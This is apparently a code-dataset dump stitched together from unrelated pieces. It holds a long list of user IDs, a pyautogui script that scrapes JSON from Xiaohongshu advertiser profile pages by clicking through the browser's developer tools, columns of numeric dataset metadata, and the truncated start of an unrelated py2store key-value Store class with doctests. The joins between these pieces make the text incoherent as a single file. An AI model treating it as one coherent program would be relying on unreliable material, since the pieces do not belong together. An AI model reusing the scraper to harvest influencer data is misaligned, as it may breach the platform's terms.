0ec513460943aef6968da","5d0781040000000012033321","5c176ebc000000000501320e","568ba6675e87e7268f5ec590","57a17b2a50c4b462bc6b4e87","594dcf4c5e87e74591d7b0ea","55b85282e4b1cf754eaa9209","6033d68a000000000101ef10","5923c6aa3460940cd30734b8","5a34deabe8ac2b1eff800a45","5b5809fb11be1002b2a47d33","57948aad82ec39283e3b9522","598a9c8850c4b46a23221f55","5a3e762ce8ac2b1dfc807c7b","5eed70c2000000000101d009","59b62f1550c4b47fbfa368d9","5a62f9d111be1020468e68ff","5929ce465e87e75abe746efb","55d0b6ba67bc6547caafbe59","5cdf637d000000000500b3eb","58c8d64750c4b44d9a2afd3a","59db0933de5fb42c49530bc7","594a2b7282ec3960a7c75397","5b1a483c4eacab4750894464","5e8edd00000000000100a0f0","5bb0ad0205d6950001986388","5d21a24e000000001600059a","5485b6fd2e1d9372740bb8b5","5accd952e8ac2b3f7d395312","5aabc26fe8ac2b5bc53f0ceb","5a96b48411be1018c6cb7f5a","56611373e00dd82a647e93b9","57e8df8a5e87e77e84d877de","58cea42d82ec39331b7997c5",
"5745c8726a6a6929a37987c9","5b2992634eacab381cdb94d3","58cb312b6a6a697d3c40c6c5","560de3d08a75e176c026bce4","563e2a56a40e184ae9dd0122","5bc61047bb6a850001289ce3","565d2636b8ce1a622fc2d334","557072a43fef9236a3a7f004","55fcc04262a60c3cd04e1036","55c5588a5894460f05895af3","55f8307ec2bdeb7467b561e6","55f2b91df5a2632b2c1d4286","5c260a220000000005034c1a","5850c39c82ec3966d92180f4","5657d0e1a40e18206298b0f2","5bcdcb10819a070001f7619e","5ff45bda000000000100887c","5a7651abe8ac2b47d28926ee","59239aa86a6a691c24955c6d","5ad151cbe8ac2b52fc2e12ce","5a4eec94e8ac2b4cb41b1785","554a1de0a46e9639a16e6975","5a6321c011be103b09d88110","5b2dc0444eacab24d7c893ab","5c5b7826000000001200eee3","5f4dc3d200000000010034d7","57bea2ab50c4b422fe1e5f92","5a43b2d511be1008e1f14dae","5583eb4e62a60c6304c01151","5a981e6911be103f408c070d","557113c262a60c3cd12b5edb","5d373caa00000000160217f2","5baa552b38cf6d000153546f","5c2224700000000005018202","58517cee50c4b41b776bb417","58dbaac782ec3913c9d1e9d5","5c4dca92000000001201aec0","5a7d3542e8ac2b6dae88d728","572491d04775a70a93be3271","592aca456a6a69570b603018","5942e94e50c4b4493b7b30f3","55b2d8cda75c951bcf225dbf","5ac747d2e8ac2b308410011f","572e9fd36a6a69408536b47e","5d4fe2570000000011010390","5ab8e0c6e8ac2b67e29c9961","56fd0fb54775a704ad189eb9","5a5693344eacab6247407016","550776d2a46e96138db80fe8","604a197c000000000100816a","5c866e34000000001000f487","57bd4c2182ec397c6035c79a","588e062e5e87e71afc7132fc","5a1908d44eacab7e370f11d2","5cda8054000000001801f4cf","584279446a6a697c18b0fd20","58957c9e82ec393823ea19c6","555eb504e58d13119503175a","58304a585e87e7618e17514c","5a500b784eacab26ade77940","59911bdfb1da144ad683cbb1","5d25e85d0000000010032b9d","561f8b3b62a60c03ff326e6c","557136a8c2bdeb16cc0ba006","5736068050c4b4492d911f8f","55cff0fbe4b1cf48c686e3ab","5bf898e8a424d7000173eab7","5658433c6a6a69734ba1171f","5935728450c4b43e0b47520f","5a9508524eacab53994527c4","570a3a86aed75813e06d5067","5bb88de5c751e00001926db2","5ab1e8e04eacab530e5b82a8","5aa6251111be103946f6a15f","5ee0f3b9000000000101e918","5c2ffac100000000050072bd","58fab8d45e87e7747c2fd7a2","5ff5663c0000000001006728","5b6d45c74cef870001e55960","5486268fd6e4a952f9c331a5","600041c4000000000100a2de","5a294d1f4eacab0d82fb459b","58baf2ea6a6a6931fdd6c855","5874a46e50c4b4220c7a2b62","5a2f761911be1056201741d5","5b8954ea27e3da000141ae50","5da31c3f0000000001007ab1","58eec89b82ec393965a1f51c","5881a69f3460945db3d3de65","58cd59bb50c4b42d2e7d8073","5ed61b930000000001002407","5a7302b211be107bb5f61c96","5f4847660000000001005a9b","56332cca03eb8457c67f5427","5ce4fcb7000000001003e169","5a8fd30d11be101e8524835f","55a9a1aac2bdeb7315c6dd69","57d6338350c4b45215e07419","5fc71a040000000001009fd5","5eeb5eb80000000001007432","58f4db166a6a69755f139b83","5512b70fb4c4d638f29b5869","5aa680eae8ac2b640dbfd51a","577f47de6a6a6914cb27c7a3","5c568720000000001a00b54f","571f54f9aed758415dba5c2e","5a007141e8ac2b01d7a1e4a8","5d917f6e000000000100664e","59feafa54eacab6c7bb2b0cc","55cb2b36a75c9560c3d14155","5ab131f74eacab792d68178a","5a87bdbe4eacab58d7e67be6","5582c9c367bc654694af161e","570cff3a84edcd49ebf57976","5daac8660000000001006ca7","583c3f2850c4b431f4ec732c","5657f388b8c8b4108b2e2c62","589c148b5e87e74af99170d4","59eb6b37e8ac2b73c443064a","5ac30b0f11be102c4a9ca613","59face1211be107932f90b40","5628e14aa40e180db9fb411b","5bb36548b71c980001a030db","5891e81b6a6a69096012a2eb","58b96599a9b2ed471c1bab31","5e3c01e50000000001004ff3","5fd897d70000000001004171","5b7176d70534150001da6470","54808b26d6e4a9617b300d2f","598c715350c4b4355cc4ffdf","5aa021114eacab1929228642","5a5203a24eacab18c
418df8a","5b0e82cc11be104f35bd3614","5a192bb44eacab22c4dfc1dd","5cb427010000000017018af8","5d0c42fc000000001003ef53","55a48c97c2bdeb418537bacf","571d0251aed7586f02028994","5756a666a9b2ed7490a301b2","5beb2c11b231910001db312f","5fa52f8a000000000101f5ae","592cd7d55e87e74e3f69f242","5f883f52000000000100af03","56a51d49b8c8b42af9fc1edf","5acc75484eacab1f6e33c19b","5f17a980000000000101f1b1","5a0a66624eacab2cd3547c58","557c55873397db03afd818d7","5c4edd61000000001003936a","5b1b3cb0e8ac2b4436a707d3","586a711382ec390cc62c4a96","5ea4500f0000000001009522","607d25700000000001005592","5cfd213a000000001703153a","5a93f67be8ac2b7e5e8feae8","5759753c7fc5b869367bbbb4","5a80121111be10486c6b2be4","5cdcd8b0000000001202a0bb","5a07df6311be10155751c12a","5657b5b5cb35fb48a4fff781","5e7e1ecd00000000010032dc","5aabe4aee8ac2b6bf6afc90f","54465beed6e4a95c715c7c33","551b7c282e1d937f113c7ad0","5f0d0f35000000000101cf56","59fd95084eacab38f7fd9e8f","586e14545e87e7414c352423","56c51ff1aed7581d118f26de","570700b94775a7711a829fae","54314fd4d6e4a97ec30dbd38","5571de6562a60c6ee591e0d5","5c8b29e6000000001001a5d3","5d84ea7200000000010183a4","54ce63d02e1d935ac1b3fedf","59a5a1806a6a692e2ccb0e9d","54db4a49b4c4d628db5b61b9","5789c7606a6a696c749b487a","59285c4e5e87e74f68992155","5c1097f40000000007019054","5b653a176b58b732d63ba7eb","57a860e082ec396d6c3dc31a","552490b29c5a6e66fecb9668","526dcdb3b4c4d638b56bc659","5e0b8e940000000001007687","5b567c7c11be103cac1fe1b1","5c7fe440000000001203fce2","56ea4a7eaed75816698316c8","5767a9256a6a691ce8f21aff","602f6ee4000000000100999a","59d308ac44363b703553c085","5d566f0f000000000101a296","5b06c9e6f7e8b97064b39b17","565802a70bf90c37bdbc5853","5ba49b6ff6ed5c00015503aa","5ccc55760000000010031f66","55a094b162a60c6fb82d0f3c","5657ac90a40e185acc6f00f3","5bc362a405b0a800011533cf","5586174567bc656851ff33af","5c092b8b0000000007006aab","59dd64a444363b3b200fa59e","59eb1bfbe8ac2b3b97ee4ce5","5e2e3fa500000000010054f3","5c08c1600000000007012182","5ad2418411be103306c70421","5b20afcfe8ac2b43f5687016","5979e25bb1da14447fc85fc1","5c0a93f00000000005008be0","58a56b9482ec396b88629f4d","565e638bcb35fb1b0c287ac7","546e1ca4d6e4a94b4d79f2e1","5a1456d311be1030b1fd8f8c","5b02db1511be1073237e24f0","559147c3b7ba2201a3b4f9a9","5b9b49ec3263770001e00c92","58972a3882ec390ece02b4d1","5a77f95011be1001c8541cde","5afbff6011be105437b6784a","5b27a807e8ac2b67933f7ed7","54fe4797a46e964082ceebd3","5c5fe0720000000011026cc1","5dbb9e3f000000000100b750","58f3961550c4b40be6e4e0be","5e7f63130000000001006dca","5899b83f5e87e71d7b22ecc0","5e521f33000000000100b089","5c06603b000000000700ca12","5571d45322cfcd1d420e9f2b","5de72fad000000000100a1d2","56528d229eb5781638e94300","55e652ed67bc654a2ed07e7e","5ba70ac7b7329a00013fb5ee","58b8dc1c82ec39570c45573a","5b59f92e11be10604dd8427a","58fea24e5e87e7149ae8d116","5aaa2a594eacab315b268c7b","549182e6b4c4d672a7e6a142","5b8ba90f04cdcb0001bff8c2","5975f7cf5e87e722a845fdb0","577aeec33460941effaa3835","58b003e882ec393f0e92ea52","59b7e39250c4b413f546ee26","5aab19fee8ac2b0c38e04b26","5e5822b700000000010081ec","5507f667a46e96261d1fb44a","59c3382651783a7b1edfd1be","595ad63682ec392959b5d0f2","5a7c8c5711be1014cfd35ed7","551261a0b4c4d633f9d375dc","5a52cc7111be1053a77bb537","58217a106a6a69161d36bf15","585e995850c4b42a81d42125","5a2beaf111be105ed915ecc8","5ad0a01fe8ac2b77ace6f10d","5961998650c4b40808c7a305","599b9e646a6a6928e4704e34","574253e282ec394d0da8fb30","5b629a91e8ac2b49f77b03d7","5e080f9800000000010055ef","5e690971000000000100008f","55a3c4ec3397db3497acd799","5fd4b4e1000000000101f13f","5ca2013d000000001103f6c4","593fe9a5
82ec394434a56844","580c863050c4b42ecfa8c4e1","5c3dd90f0000000007000af1","584aeea350c4b452666eeb3a","604efd6b00000000010017bd","5f156a6a00000000010076a0","5b1d0c12e8ac2b19718e0d09","5be703b1e4034f0001275cc7","58934d6050c4b43d1ff65347","5a854a674eacab3edaab9279","6059741e000000000100bbb5","5c43e65d00000000050384ba","557321ca3397db5adad5a346","5c8f80b40000000012022ba0","553b4cca2e1d937b7a12f2a7","58be720350c4b41c25b9b9ca","5c595fcf000000001200d14a","58288bff5e87e70795fc1cb2","565887b8f53ee00b9b96ac68","56f8be7caed758091a6a2806","5b7fdacb47bf040001c315da","565076df67bc654bec5a105d","57eb3b6bbd0da52e60a75db7","5b1b54ae4eacab340721acb9","59e741a711be104632838490","5de477b40000000001001e9f","5d37cdb6000000001603e5f0","5ce11a7a000000001803fc51","5661019f44760806ac9f1f5f","5b2304ee4eacab328a9ef6af","5b19c3c0b1da144c9fb597c7","5b7ab84ae5cab2000190b10b","5b3a004711be102716da8911","57c1b9715e87e77896a49378","5a928a344eacab147782f73d","5dd354fd0000000001006134","5b0fe09c11be1078bca38cd0","5f2cca7f00000000010042c2","5e4576780000000001006e98","561b495933f60c668a6bbf89","559b6624e4b1cf396597808c","5ebd6bc40000000001002ae2","5c7384a80000000010038384","55263b88b203d93617b793e2","5659bd98172fe71c4ebde13a","5cb6ea70000000001200d7f6","55963b1a62a60c325cd4a221","5e1d68180000000001006fe8","5b2c6e2111be106f4e2dbd8b","5821eee950c4b44bf8c78172","593242e450c4b40dbda0287d","561bdf0962a60c07c62b8593","576e10db6a6a695347fe739e","6059f5d50000000001005c6c","59f1b43811be1073f052bf4e","5a30f414e8ac2b59f0435f2a","58fdd7c86a6a692edbb904d7","59e0be9520e88f79782649bb","5a38fe69e8ac2b39bb87e9ff","5c16067700000000050165cd","56d7dfe51c07df394bfcc1be","57e5eb9d6a6a691cdfb754ce","5be18dc5f1860900016ea082","5d25b56b000000001601c6c1","5e8070650000000001001dba","5c45a6930000000005024c67","5ffe650a0000000001003836","567597219eb5786c9d82f52e","5adecd92e8ac2b01532d7e91","5e57b6ee000000000100456e","5bdfbf81c05f190001cad6b9","58b040c76a6a6921fdcbc355","56b0f0d650c4b43580cfa5f4","5f312c85000000000101e3da","5a1886fa4eacab5fb7ea07eb","55209631d39ea24786bb047e","5523dcd1a46e966508cb05b5","587df4b482ec396d6d0b7c17","55d43af5c2bdeb5049bcbb94","5f0564be0000000001000229","556f1bb5f5a26347193b4933","5b023d5a11be102ae1f7659c","587da6f56a6a6955c688968b","5e9afaf100000000010057b5","5b4f0c0f11be10421f45d6f1","58691b8e50c4b435f158f283","5bcf348d868e9b0001117395","6035fb9f0000000001003cc0","54e00cddb4c4d61c8fd8acc0","5ed67d070000000001003fa6","54e4e5192e1d933296cfec7c","5909807e6a6a693b675c1e1a","5d6382c10000000001003746","5b8374b73ff3e5000186bcaa","571f2b424775a7205695d9ba","596c5d9050c4b413883138a0","5d7def4b000000000101b2c8","54930c40b4c4d6679f7b4702","57aed2e782ec3944f77936ba","5ab8de4311be103c8667537b","563c5250e58d137011493f90","5837c16682ec392ed10546ec","576b19a66a6a6971d122e237","5cb34eb4000000001703e1cf","603a5bda000000000101cda0","5980792982ec39296bfd66f6","5eb154780000000001002e67","58958a686a6a696a4c52894f","59c25b3a44363b437753ac94","544d14b1d6e4a977d7e61228","5ae6be514eacab2d6388cc12","5c89e6ef000000001603ad73","5bdc43074fd2ce000162569d","5b67dccdbf34890001c517c6","5f044d3b000000000100205c","569b1645e4251d4f8dde80fc","58c1746950c4b446d8e573a2","5d7e4038000000000100147d","5874fbdf6a6a69151882aee7","56a608926a6a696ef905f17b","56528b2ea40e180534b4d126","5883b4d950c4b420f6ac28b9","54e9bca94fac63087d2321ee","5b40941d11be1032e7225b61","59e8614811be1076e7c0b1ab","5c2795bd0000000007021b41","57b852256a6a6942aaebe71d","5f66c2f40000000001008806","56442f90f53ee01f3d33a8f3","5a958ed04eacab12b308a055","5b05596e4eacab2bd791465d","56cd46d6aed758456431ea82",
"5f6edd440000000001000832","5ea1754c0000000001005b4e","58dd1aeb6a6a69306cd12cad","5bcc0bbf08e1b90001856519","596620885e87e760f584e871","55584ec55894467d4ddf7356","56cfba38aed75872829f2567","558d1d3fb7ba2262710af891","587e285a82ec392bdf0b7bab","5fec194100000000010087d7","5f00887500000000010012c7","56ab6678aed75813220f1e9f","5b77dbd18bbbef0001079661","566fcb24b8c8b42ed484a8ed","5afd7b394eacab09023fea1e","5bb2e9f9b0eb9900019e6d5c","53f82345b4c4d66e58ea1218","5aefadd34eacab49b1c47089","5a0d6d0211be106ac5a3068f","5c37804b0000000007025491","5653de7c82718c3bb105b9aa","565ecee203eb841d09b3a20d","53a2666eb4c4d6706a81da68","540ade4eb4c4d665976d0e02","5c220bd100000000070106f2","5a2ce2f811be1046673ac90d","5c2b885f000000000502dea7","5fab19e40000000001009e8b","5aa53fda4eacab65fe33dcc1","5572923d5894460f7ee442a2","5767625e5e87e74d61f1f24f","550cfc13d39ea256b3c91a8b","5c153ac400000000050332ca","5ede37d10000000001004fff","567ad0c150c4b4166b3e0f21","5e21ac340000000001001156","5d8df57b000000000101855b","5f2284a90000000001004ccf","5827dd8a82ec393f1be0dbcb","5992aa4650c4b45e52a01a72","5f24dcbc00000000010077f5","5b8a97aec32e0700012bd500","5b3974a311be105037eb89d8","5c9081c5000000001603914d","55aa67e667bc654991abfc37","556c77935894460d91e7419e","5b66f5ab8988dc000161ac69","5a8d636c11be107b053058c0","5a0248804eacab7eb27c7768","60502dcb00000000010078a6","58db120c82ec394d0c460d3a","55d9b871a75c9574077e2717","5f2fb9ac0000000001003ffc","556836a767bc65799f06d72c","554c271fb203d90ce6bae2f1","5b42f46f11be104776370416","547bdc01d6e4a94c0f8615c5","5c3de675000000000601fdf7","5999481750c4b4056f3f0c11","57b1c0525e87e70b6eb5c64a","5abb01d4e8ac2b656f29e14c","5b0d2b4211be10274aab3eb7","5fb7691e000000000100292d","59847f3b5e87e73fdabd328e","5df87fa90000000001000391","5c00e24200000000070024a2","5e5f3430000000000100196a","5c88b5680000000010000efd","607415d3000000000101da72","59bd44f544363b6bfcd3dbc1","5ae34a5e4eacab25c63af892","530ee268b4c4d634fa4f4d1e","55d9e21bb7ba227f315f4194","59ea8697e8ac2b35baa266d6","55dddd47b7ba220fd3aa3c14","565445c2e58d1316083f484e","5f4c99eb0000000001005b17","56586f3350c4b421251dfdb5","5b1ba6fc11be104fec134cb3","5e93ffa20000000001006237","587e923450c4b40f2151bc60","5c6ce9cb000000001003b6f4","5960514582ec3959f52025a0","5c70b58a000000001201b5d1","5993ba0082ec391f528fbffb","5afa97dd11be1029aa1e147c","5c6d65f200000000120255fb","5a3dd4d4e8ac2b5123bfbb80","5b515b0a11be105661e18be8","5c4dbe89000000001101586a","5d14afa400000000110206e3","5c6c2c05000000001001cacb","5713a321aed7584bfe3495b6","587ce5ce5e87e767ad00d90c","5e9e893a0000000001007752","5f4a03d00000000001000307","5fcb4b1400000000010025fd","5c413c5200000000060061cd","5a9105b1b1da143096856dc6","566a22b94476083970356a74","5a6580cc11be1042cd541038","5c7f22d8000000001103332b","5aefbad811be103e49856478","5e5cd140000000000100b20c","5dbcf6b20000000001008e3c","5482d2492e1d932ed9aadb6a","5a453d8111be1020f513c524","5b65a183b7f0820001e1c7ed","5e73108c0000000001008d74","5937d33b6a6a6937f77f0a1c","5d8562e20000000001019df8","555801ad5894467d3ddf64fd","5a8a5ae611be1014a4547bc2","5a946c1d4eacab7c3c64a74c","599757555e87e73b3c3cf2a2","5b21d42811be101e65b18841","5dbb61d70000000001003295","55725943b7ba2257ddfd3640","5a19761de8ac2b21a8dde21e","5a466808e8ac2b4d52998a08","5a0165b34eacab0afcf4e9b1","591f1ba16a6a695526db1638","5ace1162e8ac2b344fd15b0a","5b294214e8ac2b22e2e64c9f","598fbb9982ec3920677a38e4","58e3879482ec390f71ee8ef6","55ba3d26c2bdeb17dc88b4d2","553252e6d39ea220cdbd110c","5bb3067f05d69500010ca365","5794f10850c4b418fb10550a","5aa4c8964eacab38da4e0a10","58617edf6a6a6973b
d71148e","5acdde5fe8ac2b345c29fdd2","5ba52217f7e8b908d5ab3c3c","578625c982ec3970bbf6a7af","5b658e44423b0a0001d81e8f","5f81a2d4000000000101eb38","5c8e6e1300000000110248b8","54941571b4c4d667967b4709","5572a2265894460ed8b7bbf7","594952b96a6a691f49dcb6c4","5a98dcde4eacab303d56657c","5895fbd96a6a6975b95289b9","5a6b37de11be102adb012778","5a5eaa3011be105d993b4942","5c6fb515000000001001fd7d","59eb425ae8ac2b649a87caac","5a9040de4eacab5c78abffa5","5a6817e611be1054a2061909","59466afd50c4b42d72f056fe","55e25019e4b1cf338dd9e11c","601e7087000000000100b595","5dfa1be30000000001000fe6","5b1d5077e8ac2b3a063d0531","59d80f2d6eea8853b109bb28","5d15a5cc0000000012017df0","5bbccfc44bcb9c00014bf727","58a083195e87e74b7c5e36ca","5aa7fc6be8ac2b19e96ca658","572d424c5e87e70316c49fd2","54bb1325e779892bd39f28d3","56d628751c07df1335bdba86","5bd959be11429c0001af5330","5657c790f53ee025b7a6932c","55cb696967bc65612c624a51","5aa351b011be1074bd1a6bd0","5aae0dcf4eacab7e257f6cc6","5657c17d9eb5785c93f475ea","603cdba8000000000100b906","606e6f090000000001001332","596594a150c4b4471045704a","56eea01f4775a738c69f1e7a","5e59ca590000000001008ff3","59c8b19444363b3bfdabd39a","5cac20f50000000016037d36","5902a75550c4b47ab258c72e","5b48cf6de8ac2b726e8b3c38","5bb0941486045400015aa7de","58f02a3e50c4b46a50749c03","56d2ebe684edcd0dd5daa9d6","56a32c3882ec393f52a93b90","5ece23ae00000000010040ea","5b4d8b84e8ac2b205f0f56b6","5a72a31911be1055a50fa572","5fa56b5c000000000100ad2b","564d40940bf90c7f11300b15","5cdc1268000000001800ce94","5f250b1c0000000001003339","5ad15590e8ac2b238a8462b1","5bc9cd54b39f660001fd1827","548b0e80b4c4d651c754c22e","59c069fd44363b75d0e43733","57d4faed6a6a69393f0b6cb1","5fdeef3a00000000010032ba","5885804c82ec3918647ed46a","60caf0ff000000000101e43f","56571e5eb8c8b4178e7fbaaa","5afa359df7e8b9300f8709db","5bcb9c2371717b0001f9f3c0","57e5d30da9b2ed5934159b3c","55f12037f5a2636b0e7933cc","56a5fc89cb35fb7310b56278","570082bc84edcd46220bf1fb","5fb2a6db0000000001004da0","5573e5060bf90c61b2b6e93a","576cbdde50c4b43b2685ca2c","5df7209e0000000001008303","6066fc73000000000101c5d3","597082e76a6a6922e2ef061e","5be28cb3b9442e00014c4baf","5dd020de0000000001005f57","5c405df2000000000703ec1d","56471ec09eb5783016d49126","5a19592f11be105dc8f0701a","5e9a73f50000000001004b63","5da975540000000001005883","5a5ecfa54eacab7340101723","58a01a696a6a691e5b063cfd","5b19f45ae8ac2b2d854cc346","5d27f60000000000110206d9","5f59eae000000000010075a5","5baee504f3509b0001314603",]
# userIds=["563f28159eb5785cf3ff166c"]
num=0
for userId in userIds:
url = "https://pgy.xiaohongshu.com/solar/advertiser/kol/%s"%userId
print(url)
#点击小红书抬头
pyautogui.moveTo(x=150, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=150, y=20,clicks=1, button='left')
pyautogui.sleep(2)
#点击搜索框,
pyautogui.moveTo(x=300, y=66,duration=0, tween=pyautogui.linear)
pyautogui.click(x=300, y=66,clicks=1, button='left')
pyautogui.sleep(2)
pyautogui.hotkey("ctrl","a")
pyautogui.typewrite(url)
pyautogui.press("enter")
pyautogui.sleep(2)
#search输入uid
pyautogui.moveTo(x=1270, y=214,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1270, y=214,clicks=1, button='left')
pyautogui.sleep(1)
pyautogui.hotkey("ctrl","a")
pyautogui.typewrite(userId)
pyautogui.press("enter")
#seach选第二个
pyautogui.moveTo(x=1270, y=421,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1270, y=421,clicks=1, button='left')
pyautogui.sleep(1)
#删除
pyautogui.moveTo(x=1388, y=213,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1388, y=213,clicks=1, button='left')
pyautogui.sleep(1)
#点respone
pyautogui.moveTo(x=1700, y=439,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1700, y=439,clicks=1, button='left')
pyautogui.sleep(1)
#点数据
pyautogui.moveTo(x=1700, y=468,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1700, y=468,clicks=1, button='left')
pyautogui.sleep(1)
pyautogui.hotkey("ctrl","a")
pyautogui.hotkey("ctrl","c")
pyautogui.sleep(1)
#删除response
pyautogui.moveTo(x=1462, y=176,duration=0, tween=pyautogui.linear)
pyautogui.click(x=1462, y=176,clicks=1, button='left')
pyautogui.sleep(1)
#抓取json
pyautogui.moveTo(x=445, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=445, y=20,clicks=1, button='left')
pyautogui.sleep(1)
#粘贴json
pyautogui.moveTo(x=443, y=216,duration=0, tween=pyautogui.linear)
pyautogui.click(x=443, y=216,clicks=1, button='left')
pyautogui.hotkey("ctrl","v")
pyautogui.sleep(1)
#点击submit
pyautogui.moveTo(x=466, y=320,duration=0, tween=pyautogui.linear)
pyautogui.click(x=466, y=320,clicks=1, button='left')
pyautogui.sleep(1)
#返回原页面
pyautogui.moveTo(x=140, y=20,duration=0, tween=pyautogui.linear)
pyautogui.click(x=140, y=20,clicks=1, button='left')
pyautogui.sleep(1)
num = num+1
print(num)
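Every step in the loop above is the same move/click/sleep triple with different coordinates; factoring it into a helper makes each step read as one line. A minimal sketch under that observation; click_at is a name introduced here, not part of the original script.

# Sketch: factor the repeated move/click/sleep pattern into a helper.
# click_at is illustrative only; it wraps the same pyautogui calls used above.
import pyautogui

def click_at(x, y, wait=1):
    """Move to (x, y), left-click once, then pause for `wait` seconds."""
    pyautogui.moveTo(x=x, y=y, duration=0, tween=pyautogui.linear)
    pyautogui.click(x=x, y=y, clicks=1, button='left')
    pyautogui.sleep(wait)

# e.g. the first two steps of the loop body become:
# click_at(150, 20, wait=2)   # click the Xiaohongshu tab
# click_at(300, 66, wait=2)   # click the address bar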
| 364.930556
| 23,770
| 0.869153
| 1,246
| 26,275
| 18.32825
| 0.763242
| 0.008583
| 0.008407
| 0.012086
| 0.049612
| 0.044796
| 0.042738
| 0.034286
| 0.023164
| 0.020099
| 0
| 0.56675
| 0.014462
| 26,275
| 71
| 23,771
| 370.070423
| 0.315157
| 0.004453
| 0
| 0.345455
| 0
| 0
| 0.813052
| 0.807926
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018182
| 0
| 0.018182
| 0.036364
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b426e31b9a2c873b8f1cb5b9f374168279b497e
| 14,675
|
py
|
Python
|
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
py2store/exploration/comparing_stores.py
|
i2mint/py2misc
|
9b1fc25984dd1a504aa87700be4c3dcfcebc6f80
|
[
"Apache-2.0"
] | null | null | null |
from py2store.base import Persister, static_identity_method, Item, Key, Val, no_such_item, KeyIter
class Store(Persister):
"""
By store we mean key-value store. This could be files in a filesystem, objects in s3, or a database. Where and
how the content is stored should be specified, but StoreInterface offers a dict-like interface to this.
__getitem__ calls: _id_of_key _obj_of_data
__setitem__ calls: _id_of_key _data_of_obj
__delitem__ calls: _id_of_key
__iter__ calls: _key_of_id
>>> # Default store: no key or value conversion ################################################
>>> s = Store()
>>> s['foo'] = 33
>>> s['bar'] = 65
>>> assert list(s.items()) == [('foo', 33), ('bar', 65)]
>>> assert list(s.store.items()) == [('foo', 33), ('bar', 65)] # see that the store contains the same thing
>>>
>>> ################################################################################################
>>> # Now let's make stores that have a key and value conversion layer #############################
>>> # input keys will be upper cased, and output keys lower cased ##################################
>>> # input values (assumed int) will be converted to ascii string, and vice versa #################
>>> ################################################################################################
>>>
>>> def test_store(s):
... s['foo'] = 33 # write 33 to 'foo'
... assert 'foo' in s # __contains__ works
... assert 'no_such_key' not in s # "not in" works
... s['bar'] = 65 # write 65 to 'bar'
... assert len(s) == 2 # there are indeed two elements
... assert list(s) == ['foo', 'bar'] # these are the keys
... assert list(s.keys()) == ['foo', 'bar'] # the keys() method works!
... assert list(s.values()) == [33, 65] # the values() method works!
... assert list(s.items()) == [('foo', 33), ('bar', 65)] # these are the items
... assert list(s.store.items()) == [('FOO', '!'), ('BAR', 'A')] # but note the internal representation
... assert s.get('foo') == 33 # the get method works
... assert s.get('no_such_key', 'something') == 'something' # return a default value
... del(s['foo']) # you can delete an item given its key
... assert len(s) == 1 # see, only one item left!
... assert list(s.items()) == [('bar', 65)] # here it is
>>>
>>> # We can introduce this conversion layer in several ways. Here's a few... ######################
>>> # by subclassing ###############################################################################
>>> class MyStore(Store):
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
>>> s = MyStore(store=dict()) # note that you don't need to specify dict(), since it's the default
>>> test_store(s)
>>>
>>> # by assigning functions to converters ##########################################################
>>> class MyStore(Store):
... def __init__(self, store, _id_of_key, _key_of_id, _data_of_obj, _obj_of_data):
... super().__init__(store)
... self._id_of_key = _id_of_key
... self._key_of_id = _key_of_id
... self._data_of_obj = _data_of_obj
... self._obj_of_data = _obj_of_data
...
>>> s = MyStore(dict(),
... _id_of_key=lambda k: k.upper(),
... _key_of_id=lambda _id: _id.lower(),
... _data_of_obj=lambda obj: chr(obj),
... _obj_of_data=lambda data: ord(data))
>>> test_store(s)
>>>
>>> # using a Mixin class #############################################################################
>>> class Mixin:
... def _id_of_key(self, k):
... return k.upper()
... def _key_of_id(self, _id):
... return _id.lower()
... def _data_of_obj(self, obj):
... return chr(obj)
... def _obj_of_data(self, data):
... return ord(data)
...
>>> class MyStore(Mixin, Store): # note that the Mixin must come before Store in the mro
... pass
...
>>> s = MyStore() # no dict()? No, because default anyway
>>> test_store(s)
>>>
>>> # adding wrapper methods to an already made Store instance #########################################
>>> s = Store(dict())
>>> s._id_of_key=lambda k: k.upper()
>>> s._key_of_id=lambda _id: _id.lower()
>>> s._data_of_obj=lambda obj: chr(obj)
>>> s._obj_of_data=lambda data: ord(data)
>>> test_store(s)
"""
# __slots__ = ('_id_of_key', '_key_of_id', '_data_of_obj', '_obj_of_data')
def __init__(self, store=dict):
if isinstance(store, type):
store = store()
self.store = store
_id_of_key = static_identity_method
_key_of_id = static_identity_method
_data_of_obj = static_identity_method
_obj_of_data = static_identity_method
# Read ####################################################################
def __getitem__(self, k: Key) -> Val:
return self._obj_of_data(self.store.__getitem__(self._id_of_key(k)))
def get(self, k: Key, default=None) -> Val:
data = self.store.get(self._id_of_key(k), no_such_item)
if data is not no_such_item:
return self._obj_of_data(data)
else:
return default
# Explore ####################################################################
def __iter__(self) -> KeyIter:
return map(self._key_of_id, self.store.__iter__())
def __len__(self) -> int:
return self.store.__len__()
def __contains__(self, k) -> bool:
return self.store.__contains__(self._id_of_key(k))
def head(self) -> Item:
for k, v in self.items():
return k, v
# Write ####################################################################
def __setitem__(self, k: Key, v: Val):
return self.store.__setitem__(self._id_of_key(k), self._data_of_obj(v))
# Delete ####################################################################
def __delitem__(self, k: Key):
return self.store.__delitem__(self._id_of_key(k))
def clear(self):
raise NotImplementedError('''
The clear method was overridden to make dangerous operations difficult.
If you really want to delete all your data, you can do so by doing:
try:
while True:
self.popitem()
except KeyError:
pass''')
# Misc ####################################################################
def __repr__(self):
return self.store.__repr__()
class StoreLessDunders(Persister):
"""
Same as Store above, but with some of the explicit dunder calls in the code replaced by the equivalent builtins.
